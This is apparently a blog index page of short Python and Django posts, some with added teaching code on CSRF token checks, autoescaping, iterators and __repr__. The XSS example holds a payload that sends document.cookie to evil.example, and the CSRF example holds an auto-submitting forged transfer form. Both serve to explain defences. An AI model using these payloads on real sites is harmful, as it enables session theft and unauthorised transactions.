Software engineering facts, information, and skills categorized as Python

Cross-Site Request Forgery (CSRF) in simple words

Priya Philip 1 year, 8 months ago

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
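The attack and its standard defence, as an added example that is not part of the original post: a forged request arrives carrying the victim's session cookie (the browser attaches it to cross-site form posts), so the server cannot tell it from a real one unless the form also carries a per-session token the attacker cannot read. The check below is a synchronizer token modelled on the pattern Django's CsrfViewMiddleware uses; Session, Request, transfer, ATTACKER_PAGE and the balances are assumptions built for illustration, not Django's code.

```python
# Added example (not the page's code and not Django's): a synchronizer-token
# CSRF check on a state-changing endpoint. Session, Request, transfer,
# ATTACKER_PAGE and BALANCES are assumptions constructed for illustration.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class Session:
    """Server-side session looked up from the session cookie."""
    user: str
    # Per-session secret; embedded in every form the server renders for this user.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))

@dataclass
class Request:
    method: str
    form: dict
    # The browser attaches the session cookie to cross-site form posts too,
    # so a forged request arrives already authenticated.
    session: Optional[Session]

# Hypothetical application state.
BALANCES = {"alice": 100, "bob": 0, "attacker": 0}

# Constructed attacker page: an auto-submitting form hosted on evil.example.
# The attacker chooses every field but cannot read the victim's token.
ATTACKER_PAGE = """
<form id="f" action="https://bank.example/transfer" method="POST">
  <input type="hidden" name="to" value="attacker">
  <input type="hidden" name="amount" value="90">
</form>
<script>document.getElementById("f").submit()</script>
"""

def transfer(request: Request, check_csrf: bool) -> tuple:
    """State-changing endpoint. Returns (status, reason)."""
    if request.session is None:
        return 403, "not authenticated"
    if request.method != "POST":
        return 405, "POST required"
    if check_csrf:
        submitted = request.form.get("csrfmiddlewaretoken", "")
        # Constant-time comparison so the token cannot be recovered via timing.
        if not hmac.compare_digest(submitted, request.session.csrf_token):
            return 403, "CSRF token missing or incorrect"
    to, amount = request.form["to"], int(request.form["amount"])
    if to not in BALANCES or amount <= 0 or BALANCES[request.session.user] < amount:
        return 400, "bad transfer"
    BALANCES[request.session.user] -= amount
    BALANCES[to] += amount
    return 200, "ok"

def demo() -> dict:
    BALANCES.update(alice=100, bob=0, attacker=0)
    alice = Session(user="alice")
    # Legitimate request: the form Alice loaded from the site carried her token.
    legit = Request("POST", {"to": "bob", "amount": "10",
                             "csrfmiddlewaretoken": alice.csrf_token}, alice)
    # Forged request: fields from ATTACKER_PAGE, cookie attached by Alice's browser.
    forged = Request("POST", {"to": "attacker", "amount": "90"}, alice)
    # Forged request with a guessed token: 256 random bits are not guessable.
    guessed = Request("POST", {"to": "attacker", "amount": "90",
                               "csrfmiddlewaretoken": secrets.token_hex(32)}, alice)
    results = {
        "legit_with_check": transfer(legit, check_csrf=True)[0],
        "forged_without_check": transfer(forged, check_csrf=False)[0],
        "forged_with_check": transfer(forged, check_csrf=True)[0],
        "guessed_token_with_check": transfer(guessed, check_csrf=True)[0],
    }
    results["balances"] = dict(BALANCES)
    return results

if __name__ == "__main__":
    print(demo())
```

Without the check the forged request drains Alice's balance to the attacker; with it the forged and guessed-token requests are rejected while Alice's own post still succeeds. Note that the check only helps for state-changing methods, which is why frameworks exempt GET and insist that GET never change state.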

Is autoescape off in django safe?

Priya Philip 2 years ago

Autoescaping is a protection against cross-site scripting, not SQL injection. Turning autoescape off means you trust whatever is in "text", wherever it came from, not to be malicious (i.e. it should be impossible for a user to create or modify what is in text). If that assumption holds, you are safe against cross-site scripting; otherwise it is a security hole.
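The difference the setting makes, as an added example that is not the page's code and not Django's template engine: a toy renderer with an autoescape switch, run over a constructed attacker-controlled value. render, SafeString, TEMPLATE and PAYLOAD are assumptions built for illustration; SafeString plays the role of Django's mark_safe.

```python
# Added example (not from the original post): a toy template renderer with an
# autoescape switch. render, SafeString, TEMPLATE and PAYLOAD are assumptions
# constructed for illustration; this is not Django's template engine.
import html
import re

class SafeString(str):
    """Marks a value as trusted HTML that must not be escaped (like Django's mark_safe)."""

_PLACEHOLDER = re.compile(r"\{\{\s*(\w+)\s*\}\}")

def render(template: str, context: dict, autoescape: bool = True) -> str:
    def substitute(match):
        value = context[match.group(1)]
        # With autoescape on, every value is HTML-escaped unless explicitly marked safe.
        if autoescape and not isinstance(value, SafeString):
            return html.escape(str(value), quote=True)
        # With autoescape off the raw value is written into the page as markup.
        return str(value)
    return _PLACEHOLDER.sub(substitute, template)

TEMPLATE = "<p>Hello {{ name }}</p>"

# Constructed attacker-controlled value, e.g. a display name saved from a profile form.
PAYLOAD = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'

def render_with_autoescape() -> str:
    return render(TEMPLATE, {"name": PAYLOAD}, autoescape=True)

def render_without_autoescape() -> str:
    return render(TEMPLATE, {"name": PAYLOAD}, autoescape=False)

def render_trusted_markup() -> str:
    # Only values the application itself produced should ever be marked safe.
    return render(TEMPLATE, {"name": SafeString("<b>Administrator</b>")})

def executes_markup(page: str) -> bool:
    """Crude check used by the demo: does the attacker's tag survive as a real tag?"""
    return "<img" in page

if __name__ == "__main__":
    for fn in (render_with_autoescape, render_without_autoescape, render_trusted_markup):
        print(fn.__name__, "->", fn())
```

With autoescape on the payload is rendered as literal text (`&lt;img ...&gt;`); with it off the tag is live and its onerror handler runs in the victim's browser. Marking a value safe is the right tool when the markup is genuinely the application's own, and never for data a user can write.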


HttpRequest methods

Priya Philip 2 years ago

HttpRequest represents an incoming HTTP request, including all HTTP headers and user-submitted data.

HttpRequest attributes

Priya Philip 2 years ago

Django uses request and response objects to pass state through the system. When a page is requested, Django creates an HttpRequest object that contains metadata about the request. Then Django loads the appropriate view, passing the HttpRequest as the first argument to the view function. Each view is responsible for returning an HttpResponse object.

Infinite iterators in Python

Priya Philip 2 years, 1 month ago

An iterator is an object representing a stream of data. Repeated calls to the iterator's __next__() method (or passing it to the built-in function next()) return successive items in the stream. When no more data are available a StopIteration exception is raised instead. At this point the iterator object is exhausted and any further calls to its __next__() method just raise StopIteration again. Iterators are required to have an __iter__() method that returns the iterator object itself, so every iterator is also iterable and may be used in most places where other iterables are accepted.

One notable exception is code which attempts multiple iteration passes. A container object (such as a list) produces a fresh new iterator each time you pass it to the iter() function or use it in a for loop. Attempting this with an iterator will just return the same exhausted iterator object used in the previous iteration pass, making it appear like an empty container. An infinite iterator is one whose __next__() never raises StopIteration, so it must always be consumed with a bound (for example itertools.islice).
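The behaviours described above, as an added example that is not part of the original post: an infinite generator, exhaustion of a plain iterator versus a container, repeated StopIteration, and a bounded search over an infinite stream. naturals, take, exhaustion_demo, next_after_exhaustion and bounded_search are names chosen for this illustration.

```python
# Added example (not from the original post). All function names are
# assumptions chosen for illustration.
import itertools

def naturals():
    """Infinite generator: every next() yields the next integer, never StopIteration."""
    n = 1
    while True:
        yield n
        n += 1

def take(iterable, n):
    """Consume at most n items from any iterable, finite or infinite."""
    return list(itertools.islice(iterable, n))

def exhaustion_demo():
    data = [1, 2, 3]
    it = iter(data)
    first_pass = list(it)                     # consumes the iterator
    second_pass = list(it)                    # same object, already exhausted -> []
    fresh_passes = (list(data), list(data))   # the container hands out a fresh iterator each time
    return first_pass, second_pass, fresh_passes

def next_after_exhaustion():
    it = iter([])
    try:
        next(it)
    except StopIteration:
        pass
    # A second call raises StopIteration again; next() with a default swallows it.
    return next(it, "exhausted")

def bounded_search(predicate, limit=1_000_000):
    """Search an infinite stream, but never without a bound: a predicate that is
    never satisfied would otherwise hang the process, which is a denial of
    service whenever the predicate or the input is attacker-influenced."""
    for n in itertools.islice(naturals(), limit):
        if predicate(n):
            return n
    return None

if __name__ == "__main__":
    print(take(naturals(), 5))
    print(take(itertools.cycle("ab"), 5))     # itertools also ships infinite iterators
    print(exhaustion_demo())
    print(next_after_exhaustion())
    print(bounded_search(lambda n: n * n > 50))
```

itertools.count, itertools.cycle and itertools.repeat are the standard-library infinite iterators; like naturals() above they are only safe to iterate through islice, zip against a finite iterable, or a loop with an explicit break.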

__str__ vs __repr__ in Python

Priya Philip 2 years, 1 month ago

Both __repr__ and __str__ produce a string representation of an object, but for different audiences: __repr__ is the unambiguous, developer-facing form shown in tracebacks, debuggers and containers, while __str__ is the readable form shown by print() and str(). The default __repr__ of a str value is a quoted, escaped literal, so passing it to eval() returns an equal string object.
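The two methods side by side, as an added example that is not part of the original post: a type whose repr round-trips through eval(), the fallback rules when only one method is defined, and a credential type whose repr deliberately does not reveal its secret, since reprs end up in logs and tracebacks. Point, Credential, OnlyRepr, OnlyStr and the helper functions are assumptions constructed for illustration.

```python
# Added example (not from the original post). Point, Credential, OnlyRepr,
# OnlyStr and the helper functions are assumptions constructed for illustration.

class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y
    def __repr__(self):
        # Unambiguous and reconstructable: eval(repr(p)) == p.
        return f"Point({self.x!r}, {self.y!r})"
    def __str__(self):
        return f"({self.x}, {self.y})"
    def __eq__(self, other):
        return isinstance(other, Point) and (self.x, self.y) == (other.x, other.y)

class Credential:
    def __init__(self, user, secret):
        self.user = user
        self._secret = secret
    def __repr__(self):
        # reprs surface in tracebacks, logs and debuggers: redact the secret.
        return f"Credential(user={self.user!r}, secret=<redacted>)"
    def __str__(self):
        return f"credential for {self.user}"

class OnlyRepr:
    def __repr__(self):
        return "OnlyRepr()"

class OnlyStr:
    def __str__(self):
        return "only str"

def roundtrips(value) -> bool:
    """eval(repr(v)) == v. Only ever eval reprs this program produced itself,
    never anything that came from a user."""
    return eval(repr(value), {"Point": Point}) == value

def fallbacks() -> tuple:
    # str() falls back to __repr__ when __str__ is missing; the reverse does not
    # hold, so repr(OnlyStr()) is the default "<module.OnlyStr object at 0x...>".
    return str(OnlyRepr()), repr(OnlyStr()).startswith("<")

def secret_leaks(cred: Credential) -> bool:
    """True if the secret appears in any of the usual string conversions."""
    return any(cred._secret in s for s in (repr(cred), str(cred), f"{cred!r}", f"{cred}"))

if __name__ == "__main__":
    p = Point(1, -2.5)
    print(repr(p), str(p), roundtrips(p))
    print(roundtrips('It\'s "quoted"\n'))
    print(fallbacks())
    print(repr(Credential("alice", "hunter2")))
```

The redacted repr is the practical point: a `Credential` that lands in a list, a logged exception or a `%r` format string will show its user but never its secret.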

Difference between null=True, blank=True in django

Priya Philip 3 years, 5 months ago

The main difference between null and blank is

How to deal with “SubfieldBase has been deprecated. Use Field.from_db_value...

Varghese Chacko 3 years, 5 months ago

How to deal with "SubfieldBase has been deprecated. Use Field.from_db_value instead." On upgrade to Django 1.9, we may now get the warning

Python: ImportError: cannot import name generic

Varghese Chacko 3 years, 5 months ago

After upgrading to Django 1.9, whenever I executed the command ./manage.py runserver, I got the error:
